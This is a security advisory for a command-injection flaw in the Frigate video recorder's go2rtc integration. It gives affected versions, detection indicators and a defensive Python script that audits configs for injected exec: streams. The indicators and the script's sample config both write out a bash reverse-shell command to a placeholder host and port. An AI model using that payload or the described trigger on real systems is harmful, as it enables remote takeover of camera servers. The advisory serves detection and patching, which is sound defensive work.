CVE-2026-25643
published 2026-02-06

Priority: P267
Severity: critical
CVSS 3.1 base score: 9.1
CVSS 3.1 vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Exploit: public exploit available
EPSS: 2.87% (85.1th percentile)
Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Prior to 0.16.4, a critical Remote Command Execution (RCE) vulnerability has been identified in the Frigate integration with go2rtc. The application does not sanitize user input in the video stream configuration (config.yaml), allowing direct injection of system commands via the exec: directive. The go2rtc service executes these commands without restrictions. This vulnerability is only exploitable by an administrator or users who have exposed their Frigate install to the open internet with no authentication which allows anyone full administrative control. This vulnerability is fixed in 0.16.4.

Affected (2 ranges)

Vendor            Product   Version range   Fixed in
blakeblackshear   frigate   < 0.16.4        0.16.4
frigate           frigate   < 0.16.4        0.16.4

Detection & IOCs (extracted from sources)

command: exec:bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
other: go2rtc stream name: cve_poc
other: camera name: cve_trigger
url: rtsp://127.0.0.1:8554/cve_poc
  • Monitor Frigate config.yaml (or API config PUT/POST requests) for the presence of the 'exec:' directive inside go2rtc streams, which is the injection vector for this RCE.
  • Alert on go2rtc spawning child processes (e.g. bash, sh) with network redirection arguments such as /dev/tcp/, which indicates active exploitation of the exec: directive.
  • Detect creation of a camera named 'cve_trigger' or a go2rtc stream named 'cve_poc' in the Frigate configuration, as these are the artifact names used by the public exploit.
  • Watch for Frigate config API calls that inject a camera whose ffmpeg input path points to rtsp://127.0.0.1:8554/<stream> where the stream name matches a go2rtc exec: entry — this is the trigger mechanism used to force command execution.
  • Monitor for outbound TCP connections from the go2rtc or Frigate process to unexpected external IPs/ports, consistent with a reverse shell established after exploitation.
  • This vulnerability is only exploitable by an authenticated administrator OR by anyone if the Frigate instance is exposed to the internet without authentication. Unauthenticated internet-exposed instances are at highest risk.
  • The exploit targets Frigate versions prior to 0.16.4. The fix is version 0.16.4; ensure the patched version is deployed.
  • The go2rtc service executes injected commands without any restrictions, meaning there is no secondary sandbox or privilege boundary to rely on for mitigation.
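The first and fourth detection points above (an exec: source inside go2rtc streams, and a camera whose ffmpeg input restreams that stream from the local go2rtc port) can be checked directly against a Frigate config. The following audit script is an added example, not Frigate's or go2rtc's own code; it assumes the config has already been parsed into a dict (in practice via yaml.safe_load on config.yaml) and uses the standard Frigate keys go2rtc.streams and cameras.<name>.ffmpeg.inputs[].path. The sample config is constructed here and uses placeholder host/port values.

```python
"""Audit a parsed Frigate config for the go2rtc exec: injection pattern (CVE-2026-25643)."""
import re

# Local go2rtc restream URL used by Frigate cameras, e.g. rtsp://127.0.0.1:8554/<stream>
LOCAL_RESTREAM = re.compile(r"^rtsps?://(127\.0\.0\.1|localhost)(:\d+)?/(?P<stream>[^/?]+)")


def exec_streams(config):
    """Return {stream_name: [exec sources]} for every go2rtc stream that uses exec:."""
    found = {}
    streams = (config.get("go2rtc") or {}).get("streams") or {}
    for name, sources in streams.items():
        if isinstance(sources, str):  # go2rtc accepts a single source or a list
            sources = [sources]
        bad = [s for s in sources or [] if isinstance(s, str) and s.lstrip().startswith("exec:")]
        if bad:
            found[name] = bad
    return found


def triggering_cameras(config, exec_names):
    """Return (camera, stream) pairs whose ffmpeg input restreams an exec: stream locally."""
    hits = []
    for cam, cam_cfg in (config.get("cameras") or {}).items():
        for inp in ((cam_cfg.get("ffmpeg") or {}).get("inputs") or []):
            m = LOCAL_RESTREAM.match(str(inp.get("path", "")))
            if m and m.group("stream") in exec_names:
                hits.append((cam, m.group("stream")))
    return hits


def audit(config):
    """Combine both checks; an empty result means no exec: injection pattern was found."""
    execs = exec_streams(config)
    return {"exec_streams": execs, "trigger_cameras": triggering_cameras(config, set(execs))}


# Constructed sample config mirroring the indicators listed above (placeholder host/port).
SAMPLE_CONFIG = {
    "go2rtc": {"streams": {
        "front_door": ["rtsp://192.0.2.10:554/live"],
        "cve_poc": ["exec:bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"],
    }},
    "cameras": {
        "front_door": {"ffmpeg": {"inputs": [{"path": "rtsp://127.0.0.1:8554/front_door", "roles": ["detect"]}]}},
        "cve_trigger": {"ffmpeg": {"inputs": [{"path": "rtsp://127.0.0.1:8554/cve_poc", "roles": ["detect"]}]}},
    },
}

if __name__ == "__main__":
    for key, value in audit(SAMPLE_CONFIG).items():
        print(key, value)
```

The same functions can be run against a config body captured from the Frigate config API (PUT/POST) before it is applied, which covers the API injection path noted above.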